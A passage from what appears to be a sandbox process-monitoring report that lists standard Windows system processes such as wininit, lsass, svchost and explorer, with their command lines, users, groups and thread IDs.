cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 229 os_tid = 0x15c Process: id = "29" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x2c1e4000" os_pid = "0x160" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x128" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 230 os_tid = 0x164 Thread: id = 237 os_tid = 0x190 Thread: id = 238 os_tid = 0x194 Thread: id = 244 os_tid = 0x1a8 Thread: id = 245 os_tid = 0x1ac Thread: id = 246 os_tid = 0x1b8 Thread: id = 259 os_tid = 0x1f4 Thread: id = 311 os_tid = 0x2b8 Process: id = "30" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c756000" os_pid = "0x16c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x158" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 231 os_tid = 0x170 Thread: id = 232 os_tid = 0x174 Thread: id = 233 os_tid = 0x178 Thread: id = 234 os_tid = 0x17c Thread: id = 235 os_tid = 0x180 Thread: id = 243 os_tid = 0x1a4 Thread: id = 253 os_tid = 0x1d8 Thread: id = 254 os_tid = 0x1dc Process: id = "31" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x2c15c000" os_pid = "0x184" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x158" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 239 os_tid = 0x188 Thread: id = 248 os_tid = 0x1d0 Thread: id = 249 os_tid = 0x1d4 Thread: id = 316 os_tid = 0x2cc Thread: id = 337 os_tid = 0x320 Thread: id = 391 os_tid = 0xfc Thread: id = 392 os_tid = 0x100 Thread: id = 400 os_tid = 0x138 Process: id = "32" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0xc3ea000" os_pid = "0x1b0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 250 os_tid = 0x1b4 Thread: id = 270 os_tid = 0x210 Thread: id = 271 os_tid = 0x214 Thread: id = 272 os_tid = 0x218 Thread: id = 273 os_tid = 0x21c Thread: id = 274 os_tid = 0x220 Thread: id = 275 os_tid = 0x224 Thread: id = 276 os_tid = 0x228 Thread: id = 277 os_tid = 0x22c Thread: id = 278 os_tid = 0x230 Thread: id = 279 os_tid = 0x234 Thread: id = 280 os_tid = 0x238 Thread: id = 297 os_tid = 0x274 Thread: id = 394 os_tid = 0xf8 Thread: id = 501 os_tid = 0x548 Thread: id = 530 os_tid = 0x5c8 Thread: id = 623 os_tid = 0x73c Process: id = "33" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0xcef5000" os_pid = "0x1c0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 251 os_tid = 0x1c4 Thread: id = 255 os_tid = 0x1e0 Thread: id = 257 os_tid = 0x1e8 Thread: id = 258 os_tid = 0x1ec Thread: id = 260 os_tid = 0x1f0 Thread: id = 261 os_tid = 0x1f8 Thread: id = 262 os_tid = 0x1fc Thread: id = 265 os_tid = 0x200 Thread: id = 266 os_tid = 0x204 Thread: id = 267 os_tid = 0x208 Thread: id = 268 os_tid = 0x20c Thread: id = 331 os_tid = 0x30c Thread: id = 342 os_tid = 0x338 Thread: id = 399 os_tid = 0xf4 Thread: id = 429 os_tid = 0x40c Process: id = "34" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0xcefc000" os_pid = "0x1c8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x160" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 252 os_tid = 0x1cc Thread: id = 282 os_tid = 0x244 Thread: id = 313 os_tid = 0x2bc Thread: id = 315 os_tid = 0x2c4 Thread: id = 320 os_tid = 0x2d8 Thread: id = 321 os_tid = 0x2dc Thread: id = 322 os_tid = 0x2e0 Thread: id = 323 os_tid = 0x2e4 Thread: id = 325 os_tid = 0x2ec Thread: id = 327 os_tid = 0x2f4 Thread: id = 652 os_tid = 0x7b0 Process: id = "35" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x2c19c000" os_pid = "0x23c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007079" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 281 os_tid = 0x240 Thread: id = 283 os_tid = 0x248 Thread: id = 284 os_tid = 0x24c Thread: id = 285 os_tid = 0x250 Thread: id = 286 os_tid = 0x254 Thread: id = 287 os_tid = 0x258 Thread: id = 288 os_tid = 0x25c Thread: id = 289 os_tid = 0x260 Thread: id = 291 os_tid = 0x264 Thread: id = 294 os_tid = 0x268 Thread: id = 295 os_tid = 0x26c Thread: id = 296 os_tid = 0x270 Thread: id = 299 os_tid = 0x27c Thread: id = 301 os_tid = 0x288 Thread: id = 302 os_tid = 0x28c Thread: id = 304 os_tid = 0x294 Thread: id = 344 os_tid = 0x334 Thread: id = 599 os_tid = 0x6e4 Thread: id = 601 os_tid = 0x6ec Process: id = "36" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1e7da000" os_pid = "0x280" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b6a7" [0xc000000f], "LOCAL" [0x7] Thread: id = 300 os_tid = 0x284 Thread: id = 303 os_tid = 0x290 Thread: id = 305 os_tid = 0x298 Thread: id = 306 os_tid = 0x29c Thread: id = 307 os_tid = 0x2a0 Thread: id = 308 os_tid = 0x2a4 Thread: id = 309 os_tid = 0x2a8 Thread: id = 310 os_tid = 0x2ac Thread: id = 485 os_tid = 0x4f4 Thread: id = 583 os_tid = 0x6a4 Thread: id = 635 os_tid = 0x770 Process: id = "37" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xabe7000" os_pid = "0x2b0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b97e" [0xc000000f], "LOCAL" [0x7] Thread: id = 312 os_tid = 0x2b4 Thread: id = 314 os_tid = 0x2c0 Thread: id = 317 os_tid = 0x2c8 Thread: id = 318 os_tid = 0x2d0 Thread: id = 319 os_tid = 0x2d4 Thread: id = 324 os_tid = 0x2e8 Thread: id = 336 os_tid = 0x300 Thread: id = 346 os_tid = 0x344 Thread: id = 348 os_tid = 0x34c Thread: id = 353 os_tid = 0x364 Thread: id = 354 os_tid = 0x368 Thread: id = 357 os_tid = 0x370 Thread: id = 367 os_tid = 0x398 Thread: id = 368 os_tid = 0x39c Thread: id = 369 os_tid = 0x3a0 Thread: id = 372 os_tid = 0x3b0 Thread: id = 374 os_tid = 0x3b8 Thread: id = 434 os_tid = 0x420 Thread: id = 441 os_tid = 0x43c Thread: id = 442 os_tid = 0x440 Thread: id = 445 os_tid = 0x450 Thread: id = 450 os_tid = 0x464 Thread: id = 451 os_tid = 0x468 Thread: id = 526 os_tid = 0x5b8 Thread: id = 552 os_tid = 0x620 Thread: id = 561 os_tid = 0x644 Thread: id = 568 os_tid = 0x664 Thread: id = 569 os_tid = 0x668 Thread: id = 571 os_tid = 0x670 Thread: id = 580 os_tid = 0x698 Thread: id = 581 os_tid = 0x69c Process: id = "38" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x2bad7000" os_pid = "0x2f8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x184" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 328 os_tid = 0x2fc Thread: id = 329 os_tid = 0x304 Thread: id = 330 os_tid = 0x308 Thread: id = 332 os_tid = 0x310 Thread: id = 333 os_tid = 0x318 Thread: id = 334 os_tid = 0x31c Thread: id = 338 os_tid = 0x324 Thread: id = 339 os_tid = 0x328 Thread: id = 340 os_tid = 0x32c Thread: id = 341 os_tid = 0x330 Thread: id = 491 os_tid = 0x520 Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x97f0000" os_pid = "0x33c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ce23" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 345 os_tid = 0x340 Thread: id = 347 os_tid = 0x348 Thread: id = 349 os_tid = 0x350 Thread: id = 350 os_tid = 0x354 Thread: id = 351 os_tid = 0x358 Thread: id = 356 os_tid = 0x36c Thread: id = 359 os_tid = 0x378 Thread: id = 360 os_tid = 0x37c Thread: id = 364 os_tid = 0x38c Thread: id = 365 os_tid = 0x390 Thread: id = 377 os_tid = 0x3c4 Thread: id = 379 os_tid = 0x3cc Thread: id = 382 os_tid = 0x3dc Thread: id = 384 os_tid = 0x3e4 Thread: id = 386 os_tid = 0x3ec Thread: id = 387 os_tid = 0x3f0 Thread: id = 395 os_tid = 0x104 Thread: id = 396 os_tid = 0x110 Thread: id = 422 os_tid = 0x3c8 Thread: id = 427 os_tid = 0x140 Thread: id = 432 os_tid = 0x414 Thread: id = 435 os_tid = 0x424 Thread: id = 590 os_tid = 0x6c0 Thread: id = 592 os_tid = 0x6c8 Thread: id = 593 os_tid = 0x6cc Thread: id = 594 os_tid = 0x6d4 Thread: id = 597 os_tid = 0x6e0 Thread: id = 631 os_tid = 0x758 Thread: id = 632 os_tid = 0x75c Thread: id = 633 os_tid = 0x768 Thread: id = 639 os_tid = 0x780 Thread: id = 648 os_tid = 0x7a4 Thread: id = 655 os_tid = 0x7bc Process: id = "40" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xa0f6000" os_pid = "0x35c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d095" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 352 os_tid = 0x360 Thread: id = 358 os_tid = 0x374 Thread: id = 361 os_tid = 0x380 Thread: id = 362 os_tid = 0x384 Thread: id = 363 os_tid = 0x388 Thread: id = 366 os_tid = 0x394 Thread: id = 378 os_tid = 0x3c8 Thread: id = 380 os_tid = 0x3d0 Thread: id = 383 os_tid = 0x3e0 Thread: id = 385 os_tid = 0x3e8 Thread: id = 388 os_tid = 0x3f4 Thread: id = 403 os_tid = 0x140 Thread: id = 404 os_tid = 0x134 Thread: id = 405 os_tid = 0x12c Thread: id = 413 os_tid = 0x208 Thread: id = 414 os_tid = 0x200 Thread: id = 433 os_tid = 0x41c Thread: id = 458 os_tid = 0x484 Thread: id = 459 os_tid = 0x488 Thread: id = 465 os_tid = 0x48c Thread: id = 468 os_tid = 0x418 Thread: id = 475 os_tid = 0x4a0 Thread: id = 478 os_tid = 0x4d8 Thread: id = 503 os_tid = 0x550 Thread: id = 595 os_tid = 0x6d8 Thread: id = 600 os_tid = 0x6e8 Thread: id = 602 os_tid = 0x6f0 Thread: id = 603 os_tid = 0x6f4 Thread: id = 604 os_tid = 0x6f8 Thread: id = 605 os_tid = 0x6fc Thread: id = 606 os_tid = 0x700 Thread: id = 608 os_tid = 0x704 Thread: id = 609 os_tid = 0x708 Thread: id = 610 os_tid = 0x70c Thread: id = 611 os_tid = 0x710 Thread: id = 613 os_tid = 0x718 Thread: id = 614 os_tid = 0x71c Thread: id = 615 os_tid = 0x720 Thread: id = 617 os_tid = 0x728 Thread: id = 628 os_tid = 0x74c Thread: id = 646 os_tid = 0x79c Thread: id = 663 os_tid = 0x7dc Thread: id = 666 os_tid = 0x7e4 Thread: id = 667 os_tid = 0x7e8 Thread: id = 668 os_tid = 0x7ec Thread: id = 669 os_tid = 0x7f0 Thread: id = 670 os_tid = 0x7f4 Thread: id = 671 os_tid = 0x7f8 Thread: id = 672 os_tid = 0x7fc Thread: id = 673 os_tid = 0x3c8 Thread: id = 674 os_tid = 0x40c Process: id = "41" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x80da000" os_pid = "0x3a4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x2b0" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2d8" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b97e" [0xc000000f], "LOCAL" [0x7] Thread: id = 370 os_tid = 0x3a8 Thread: id = 371 os_tid = 0x3ac Thread: id = 373 os_tid = 0x3b4 Thread: id = 375 os_tid = 0x3bc Thread: id = 376 os_tid = 0x3c0 Thread: id = 540 os_tid = 0x5f0 Thread: id = 545 os_tid = 0x604 Thread: id = 548 os_tid = 0x610 Thread: id = 549 os_tid = 0x614 Thread: id = 553 os_tid = 0x624 Thread: id = 554 os_tid = 0x628 Process: id = "42" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f07000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e0b3" [0xc000000f], "LOCAL" [0x7] Thread: id = 389 os_tid = 0x3fc Thread: id = 390 os_tid = 0xc8 Thread: id = 393 os_tid = 0xd0 Thread: id = 397 os_tid = 0x114 Thread: id = 398 os_tid = 0x10c Thread: id = 401 os_tid = 0x108 Thread: id = 402 os_tid = 0x13c Thread: id = 436 os_tid = 0x428 Thread: id = 525 os_tid = 0x5b4 Thread: id = 625 os_tid = 0x740 Thread: id = 627 os_tid = 0x748 Thread: id = 629 os_tid = 0x750 Thread: id = 634 os_tid = 0x76c Thread: id = 636 os_tid = 0x774 Thread: id = 643 os_tid = 0x790 Thread: id = 653 os_tid = 0x7b4 Thread: id = 654 os_tid = 0x7b8 Thread: id = 659 os_tid = 0x7cc Thread: id = 662 os_tid = 0x7d8 Thread: id = 664 os_tid = 0x7e0 Process: id = "43" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x778d000" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x23c" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d095" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 406 os_tid = 0x144 Thread: id = 407 os_tid = 0x170 Thread: id = 408 os_tid = 0x15c Thread: id = 409 os_tid = 0x158 Thread: id = 410 os_tid = 0x1a8 Thread: id = 411 os_tid = 0x204 Thread: id = 412 os_tid = 0x1c4 Process: id = "44" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x2bd74000" os_pid = "0x250" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x184" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 415 os_tid = 0x27c Thread: id = 537 os_tid = 0x5e4 Thread: id = 539 os_tid = 0x5ec Process: id = "45" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x56be000" os_pid = "0x29c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 416 os_tid = 0x2f0 Thread: id = 417 os_tid = 0x358 Thread: id = 419 os_tid = 0x36c Thread: id = 423 os_tid = 0xfc Thread: id = 424 os_tid = 0x138 Thread: id = 425 os_tid = 0x10c Thread: id = 426 os_tid = 0x1c4 Thread: id = 428 os_tid = 0x398 Thread: id = 430 os_tid = 0x410 Thread: id = 452 os_tid = 0x46c Thread: id = 460 os_tid = 0x490 Thread: id = 461 os_tid = 0x494 Thread: id = 463 os_tid = 0x498 Thread: id = 464 os_tid = 0x49c Thread: id = 466 os_tid = 0x4a8 Thread: id = 467 os_tid = 0x4ac Thread: id = 469 os_tid = 0x4b0 Thread: id = 470 os_tid = 0x4b4 Thread: id = 471 os_tid = 0x4b8 Thread: id = 472 os_tid = 0x4bc Thread: id = 473 os_tid = 0x4c0 Thread: id = 474 os_tid = 0x4d4 Thread: id = 479 os_tid = 0x4dc Thread: id = 480 os_tid = 0x4e0 Thread: id = 481 os_tid = 0x4e4 Thread: id = 482 os_tid = 0x4ec Thread: id = 486 os_tid = 0x4f8 Thread: id = 490 os_tid = 0x514 Thread: id = 493 os_tid = 0x51c Thread: id = 498 os_tid = 0x538 Thread: id = 500 os_tid = 0x544 Thread: id = 515 os_tid = 0x58c Thread: id = 533 os_tid = 0x5d4 Thread: id = 534 os_tid = 0x5d8 Thread: id = 535 os_tid = 0x5dc Thread: id = 538 os_tid = 0x5e8 Thread: id = 541 os_tid = 0x5f4 Thread: id = 546 os_tid = 0x608 Thread: id = 547 os_tid = 0x60c Thread: id = 645 os_tid = 0x798 Thread: id = 649 os_tid = 0x7a8 Thread: id = 650 os_tid = 0x7ac Thread: id = 675 os_tid = 0x434 Process: id = "46" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x7b437000" os_pid = "0x404" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x33c" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e70d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 431 os_tid = 0x408 Thread: id = 437 os_tid = 0x42c Thread: id = 438 os_tid = 0x430 Thread: id = 439 os_tid = 0x434 Thread: id = 440 os_tid = 0x438 Thread: id = 642 os_tid = 0x78c Thread: id = 644 os_tid = 0x794 Process: id = "47" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7bb24000" os_pid = "0x444" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x1b0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = 